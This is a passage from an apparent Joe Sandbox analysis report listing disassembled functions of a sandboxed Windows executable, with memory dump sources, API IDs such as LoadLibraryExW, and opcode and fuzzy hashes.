                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA219121B0865145FA14AE16AD843BAEAB1FF49BD4FCD6438DD0E47783CE3DE051DA20
                                                                                                                                                                                                                        Function 00007FF72935AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                        • Instruction ID: 72a02e4dad3fc9d276735159a8f6c4247cdef685b8be5e5fc3c2553e42758259
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E319E21A08642A2E7157F148CC127CAEB0EB5CBA0FC90139D91D973E3CE7CA455BB30
                                                                                                                                                                                                                        Function 00007FF729358C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                        • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction ID: 3489ee5e0a615646520594ca1b287668a195354031671f03e6b5ffd98339dbdf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1921A136A157059AEB25AF64C8802FC7BB0FB0C318F88063ED61C06AD6DF38D444DB60
                                                                                                                                                                                                                        Function 00007FF7293552A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                        • Instruction ID: 2b0d4be6aee9443156405abbd578a9e00e387924405ddc560a8f0ea3820f482a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10116522A1D64151EA60BF51988017EEA74EF5DB80FCC4039EA4C57697CF3CE540AF60
                                                                                                                                                                                                                        Function 00007FF729365664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                        • Instruction ID: 5bb6896085856dc864b2a7a860ab44ef23d47541755c75a2aad12cb8413a430a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4921307361868286DB61AF18D880369BAB0EB94B94F99423CD75D476D6DF3CD400DF14
                                                                                                                                                                                                                        Function 00007FFBABA676F0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1742869199.00007FFBABA51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFBABA50000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742839723.00007FFBABA50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742961864.00007FFBABB05000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1743007698.00007FFBABB3F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1743043071.00007FFBABB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ffbaba50000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: __vcrt_initialize_locks__vcrt_initialize_winapi_thunks
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2444027679-0
                                                                                                                                                                                                                        • Opcode ID: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                                        • Instruction ID: 665ab4f1d79dc12fa6f35d17da0111508b9ab29a80002746eca49d05d1cfe8c5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E1119A1E1A64251FE678B34E5403B962A1FF04BA0F98C539DD7D027F5EE7CE8419610
                                                                                                                                                                                                                        Function 00007FF72934F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                        • Instruction ID: d023442f11e0261deecdf79c6fbe4e9c0f01fe329ce69825ea8aa3c12483c3b6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3001A521A0874240E904BF569D40079FAB5EB59FE0F8D5639DE6C53BD7DE3CD4129B10
                                                                                                                                                                                                                        Function 00007FF7293481A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7293486B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF729343FA4,00000000,00007FF729341925), ref: 00007FF7293486E9
                                                                                                                                                                                                                        • LoadLibraryExW.KERNELBASE(?,00007FF729345C06,?,00007FF72934308E), ref: 00007FF7293481C2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1741948678.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741917111.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1741994437.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742030379.00007FF729383000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000D.00000002.1742100175.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2592636585-0
                                                                                                                                                                                                                        • Opcode ID: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                                                                                                                                                                        • Instruction ID: fb7b22f9cffbabacb8663c81dfe8089007689eb3d4aecb7008b8856d48990ba6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99459516253cb9cb4854e4c73e6f2a87dddee0b16df49a4a0f63266b22594f97
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2FD08601B1815141EA44BB67AD8556595619B8DBC0E8C9038DE1C07746DC3CC0400F04